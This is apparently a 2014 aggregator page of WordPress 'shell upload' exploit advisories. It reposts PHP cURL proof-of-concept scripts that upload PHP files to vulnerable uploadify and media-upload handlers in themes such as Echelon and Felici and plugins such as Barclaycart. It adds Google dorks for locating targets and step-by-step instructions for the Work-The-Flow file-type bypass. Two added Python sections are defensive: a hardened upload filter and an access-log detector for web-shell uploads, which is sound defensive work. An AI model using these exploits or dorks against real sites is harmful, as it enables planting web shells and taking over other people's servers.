WordPress WPtouch Mobile 3.4.5 Shell Upload

27 August 2014 - Source: http://www.mondounix.com
WordPress WPtouch Mobile Plugin File Upload Vulnerability
 

Read more »

WordPress cnhk-slideshow Shell Upload

19 May 2014 - Source: http://www.mondounix.com
...

Read more »

WordPress Echelon Theme Shell Upload

1 May 2014 - Source: http://www.mondounix.com
# Exploit Author: Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/

# Exploit:
==========

<?php
// Local file to send; the theme's media-upload.php reads it from the "orange_themes" form field.
$uploadfile = "file.php";

// The handler is hit directly, with no WordPress session cookie.
$ch = curl_init("http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// The "@file" upload syntax used by the original PoC is disabled by default since PHP 5.6
// and gone in PHP 7; CURLFile (PHP >= 5.5) sends the same multipart part.
$part = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes' => $part));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
 
=========
 
Shell Access:...

Read more »

WordPress Work-The-Flow 1.2.1 Shell Upload

30 April 2014 - Source: http://www.mondounix.com
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
 
 
Submit an image file through the WTF upload panel and intercept the resulting POST request to /wp-admin/admin-ajax.php.

The form field 'accept_file_types' is supplied by the client and honoured by the server, so editing it lets normally disallowed file types such as PHP through.

Append '|php' to the field:

------------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n


Then change the extension in the 'filename' parameter to '.php' and enter...

Read more »
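The bug class behind the Work-The-Flow steps above is an upload filter whose allowlist comes from the request. The Python below is an added example written for this page, not code from the advisory or from the plugin: it models that client-driven check next to a server-side one. It assumes the plugin's intended allowlist is the intercepted field without the appended "php", and the list of executable extensions is an assumption about a typical PHP host. The server-side check also rejects the double-extension names (name.php.jpg) that the uploadify PoCs elsewhere on this page use, and names carrying control characters.

```python
import posixpath
import re

# Server-side allowlist. Assumption for this example: the plugin's intended set is
# the intercepted list without the attacker-appended "php".
SERVER_ACCEPT = frozenset(("jpg", "jpeg", "mpg", "mp3", "png", "gif", "wav", "ogg"))

# Extensions a typical Apache+mod_php or PHP-FPM host may hand to the interpreter.
# Assumption about the deployment, not taken from the advisory.
EXECUTABLE = frozenset(("php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"))


def vulnerable_is_allowed(filename, accept_file_types):
    """The flawed check: the alternatives of the extension regex come straight from
    the client's 'accept_file_types' form field, so the client sets the policy.
    Only the final extension is examined, so 'name.php.jpg' passes even with the
    unedited list."""
    pattern = re.compile(r"\.(" + accept_file_types + r")$", re.IGNORECASE)
    return pattern.search(filename) is not None


def hardened_is_allowed(filename):
    """Server-side check that ignores anything the client says about accepted types.
    It normalises the name and refuses any name carrying an executable extension in
    any position, so 'shell.php', 'shell.php.' and 'cafc.php.jpg' are all rejected."""
    name = posixpath.basename(filename.replace("\\", "/"))  # drop path components
    name = name.strip().rstrip(".")  # Windows silently drops trailing dots
    if any(ord(c) < 32 for c in name):
        return False  # NUL or other control bytes: classic truncation trick
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension, or a dotfile such as .htaccess
    extensions = parts[1:]
    if any(ext in EXECUTABLE for ext in extensions):
        return False
    return extensions[-1] in SERVER_ACCEPT


# The field as seen in the intercepted request, before and after the edit.
ORIGINAL_FIELD = "jpg|jpeg|mpg|mp3|png|gif|wav|ogg"
EDITED_FIELD = ORIGINAL_FIELD + "|php"

if __name__ == "__main__":
    for name in ("photo.jpg", "shell.php", "cafc.php.jpg", "shell.php."):
        print(name,
              "client-supplied list:", vulnerable_is_allowed(name, EDITED_FIELD),
              "server-side check:", hardened_is_allowed(name))
```

Even the hardened check only decides whether a name is acceptable; a real handler should additionally store the file under a server-generated name and keep the upload directory non-executable, so that a bypass of the name check does not become code execution.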

WordPress Business Intelligence 1.0.6 Shell Upload

31 March 2014 - Source: http://www.mondounix.com
##############################################################################################
# Exploit Title   : WordPress plugin "wp-business-intelligence" remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# Vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool, Team indishell, Hardeep Singh
##############################################################################################

////////////////////////////////////
PoC: Remote Code Execution
////////////////////////////////////
This plugin is vulnerable to remote code execution because of ofc_upload_image.php...

Read more »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof of concept:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Read more »

WordPress Felici / Custom Background Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof of concept:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Read more »

WordPress Barclaycart Shell Upload

10 March 2014 - Source: http://www.mondounix.com
                        WordPress Barclaycart Plugin Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Read more »

WordPress Premium Gallery Manager Shell Upload

8 March 2014 - Source: http://www.mondounix.com
          WordPress Plugin Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Read more »
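For defenders, the common thread across the Echelon, Custom Background, Felici, Barclaycart and Premium Gallery Manager entries is an upload handler reached by a direct POST with no WordPress session (the PoC scripts send no cookie), typically followed by a request for the dropped file. The Python below is an added detection example written for this page, not part of any advisory on it: it scans web-server access log lines in the combined format for POSTs to the handler paths quoted in those entries (and to any uploadify.php, since the same bundled script turns up under several plugins and themes) and for PHP-looking names served from under /wp-content/uploads/, then reports clients that did both. The log lines are constructed for the example, and the uploads directory prefix is an assumption about where the handlers write.

```python
import re
from collections import namedtuple

# Upload handler paths quoted in the advisories on this page, lower-cased because
# several PoCs were run against Windows hosts, where paths are case-insensitive.
KNOWN_HANDLERS = {
    "/wp-content/themes/echelon/lib/admin/functions/media-upload.php",
    "/wp-content/plugins/custom-background/uploadify/uploadify.php",
    "/wp-content/themes/felici/sprites/js/uploadify/uploadify.php",
    "/wp-content/plugins/barclaycart/uploadify/uploadify.php",
    "/wp-content/plugins/premium_gallery_manager/uploadify/uploadify.php",
}

# Assumption: files written by the handlers end up below this prefix.
UPLOADS_PREFIX = "/wp-content/uploads/"

# ".php", ".php5", ".phtml", ".phar" as the last extension or followed by another
# one, so "cafc.php.jpg" matches too.
PHP_EXT = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)")

# Apache/nginx "combined" format. Written for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

Hit = namedtuple("Hit", "ip ts kind path status")


def classify(method, path, status):
    """Return the indicator kind for one request, or None."""
    low = path.lower()
    if method == "POST" and (low in KNOWN_HANDLERS or low.endswith("/uploadify.php")):
        return "upload-handler-post"
    if low.startswith(UPLOADS_PREFIX) and PHP_EXT.search(low) and status.startswith("2"):
        return "php-under-uploads"
    return None


def scan_access_log(lines):
    """Parse combined-format lines and return indicators in log order.
    Lines that do not parse are skipped rather than raising."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        path = m["path"].split("?", 1)[0]  # drop the query string
        kind = classify(m["method"], path, m["status"])
        if kind:
            hits.append(Hit(m["ip"], m["ts"], kind, path, m["status"]))
    return hits


def suspected_shells(hits):
    """Clients that got a 2xx from an upload handler and later fetched a PHP-looking
    file under the uploads directory."""
    uploaded, flagged = set(), set()
    for h in hits:
        if h.kind == "upload-handler-post" and h.status.startswith("2"):
            uploaded.add(h.ip)
        elif h.kind == "php-under-uploads" and h.ip in uploaded:
            flagged.add(h.ip)
    return flagged


# Constructed sample log using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2014:10:02:11 +0000] "POST /wp-content/plugins/custom-background/uploadify/uploadify.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Mar/2014:10:02:14 +0000] "GET /wp-content/uploads/cafc.php.jpg?cmd=id HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Mar/2014:10:05:40 +0000] "GET /wp-content/uploads/2014/03/photo.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Mar/2014:10:06:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [25/Mar/2014:10:07:30 +0000] "POST /wp-content/plugins/barclaycart/uploadify/uploadify.php HTTP/1.1" 404 209 "-" "curl/7.35.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(h.ts, h.ip, h.kind, h.path, h.status)
    print("suspected web shells from:", sorted(suspected_shells(found)))
```

The admin-ajax.php POST in the sample is deliberately not flagged: that endpoint carries all of WordPress's AJAX traffic, so catching the Work-The-Flow case needs request bodies (the accept_file_types field) rather than access-log paths. The 404 against the Barclaycart path is still recorded, since a failed probe from a scanner is worth knowing about even though it cannot have dropped a file.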

WordPress thecotton Themes Remote File Upload Vulnerability

3 March 2014 - Source: http://www.mondounix.com

Read more »